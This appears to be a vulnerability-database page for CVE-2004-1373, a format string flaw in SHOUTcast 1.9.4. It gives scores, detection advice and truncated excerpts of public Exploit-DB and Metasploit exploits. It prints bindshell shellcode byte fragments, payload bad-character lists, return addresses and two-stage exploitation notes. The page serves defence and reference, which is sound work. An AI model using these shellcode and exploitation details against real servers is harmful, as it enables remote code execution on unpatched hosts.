CVE-2004-1373
published 2004-12-23CVE-2004-1373: Format string vulnerability in SHOUTcast 1.9.4 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via format…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
70.07%
99.3th percentile
Format string vulnerability in SHOUTcast 1.9.4 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via format string specifiers in a content URL, as demonstrated in the filename portion of a .mp3 file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | shoutcast_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6\xb0\x02\xcd\x80
bytes↗
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA
- →Detect HTTP GET requests to /content/ paths containing format string specifiers (e.g., %x, %n, %#0) in the filename, particularly in .mp3 file requests. ↗
- →Alert on HTTP requests to SHOUTcast (default port 8000) where the URI path under /content/ contains %x, %n, or %#0 format string tokens followed by a .mp3 extension. ↗
- →Two-stage exploitation pattern: first request seeds shellcode in a .mp3 filename path; second request uses chained %x/%n format specifiers to trigger the overflow. Detect two rapid sequential GET /content/ requests from the same source IP. ↗
- →Monitor for outbound connections from the SHOUTcast server process to attacker-controlled ports (1180 for Windows exploit, 7000 for Linux exploit) following receipt of a malformed /content/ request, indicating successful shellcode execution. ↗
- →Bad characters for payload delivery include null bytes and HTTP special characters; payloads will avoid: \x00 \x3a \x26 \x3f \x25 \x23 \x20 \x0a \x0d \x2f \x2b \x0b \x5c. Signatures should account for encoded shellcode in the URI. ↗
- →Check SHOUTcast server version banner for 'v1.9.4' combined with 'win32' platform string in HTTP responses to identify vulnerable targets. ↗
- ·The Windows exploit targets specific msvcrt.dll addresses for XP SP1 and W2K SP4; other service pack levels require different return addresses. ↗
- ·The Metasploit module uses ws2help.dll and PEB return addresses per target OS; Windows 2003 Server uses a PEB return address (0x7ffc0638) rather than a DLL address. ↗
- ·The Linux exploit notes that %number$x and %number$n format string variants are filtered by SHOUTcast, requiring use of sequential non-positional %x/%n specifiers instead. ↗
- ·Payload space is constrained to 250 bytes in the Metasploit module due to the format string buffer construction (1046 - payload length = padding width). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2004-1373 SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)
SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)
---
##
# $Id: shoutcast_format.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow',
'Description' => %q{
This module exploits a format string vulnerability in the
Nullsoft SHOUTcast server for Windows. The vulnerability is
triggered by requesting a file path that contains format
string specifiers. This vulnerability was discovered by
Tomasz Trojanowski and Damian Put.
Exploit-DB
SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow
exploitdb·2005-02-19
CVE-2004-1373 SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow
SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow
---
/*
Object: PoC for Nullsoft SHOUTcast 1.9.4 File Request Format String Vulnerability
From the securityfocus bid at https://www.securityfocus.com/bid/12096 :
"This issue was reported to exist in version 1.9.4 on Linux. It is likely that versions for other
platforms are also affected by the vulnerability, though it is not known to what degree they are
exploitable."
This is now clarified, it's exploitable.
notes: This is a two steps exploitation: the format bug is used to compute a buffer
that will overwrite the stack later, resulting in a SEH overwriting.
The exploit works for both the GUI and the console servers.
greets: Sputnik
`date`: Sat Feb 19 15:48:45 2005
credits: Tomasz Trojanowski
author: mandragore, ma
Exploit-DB
SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow
exploitdb·2004-12-23
CVE-2004-1373 SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow
SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow
---
/* SHOUTcast DNAS/Linux v1.9.4 format string remote exploit */
/* Damian Put Cyber-Crime Team (www.CC-Team.org) */
/* Tested on slackware 9.1 and 10.0 (0xbf3feee0) */
/* When exploit only crash SHOUTcast we should calculate new address: */
/* */
/* bash-2.05b$ gdb sc_serv core */
/* ... */
/* (gdb) x/x $edi */
/* 0xbe462270: 0x78257825 */
/* (gdb) x/x 0xbe462270-996 */
/* 0xbe461e8c: 0x5050c031 */
/* */
/* 0xbe461e8c - This is our shellcode addr */
/* */
/* Now we "only" must change format string code in req2 :-) */
#include
#include
#include
#include
#include
#include
#include
/* Default SHOUTcast port */
#define PORT 8000
char shellcode[] = //bindshellcode (port 7000)
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04
Metasploit
SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
metasploit
SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=110382975516003&w=2http://marc.info/?l=bugtraq&m=110886444014745&w=2http://securitytracker.com/id?1012675http://www.gentoo.org/security/en/glsa/glsa-200501-04.xmlhttp://www.securityfocus.com/bid/12096https://exchange.xforce.ibmcloud.com/vulnerabilities/18669http://marc.info/?l=bugtraq&m=110382975516003&w=2http://marc.info/?l=bugtraq&m=110886444014745&w=2http://securitytracker.com/id?1012675http://www.gentoo.org/security/en/glsa/glsa-200501-04.xmlhttp://www.securityfocus.com/bid/12096https://exchange.xforce.ibmcloud.com/vulnerabilities/18669
2004-12-23
Published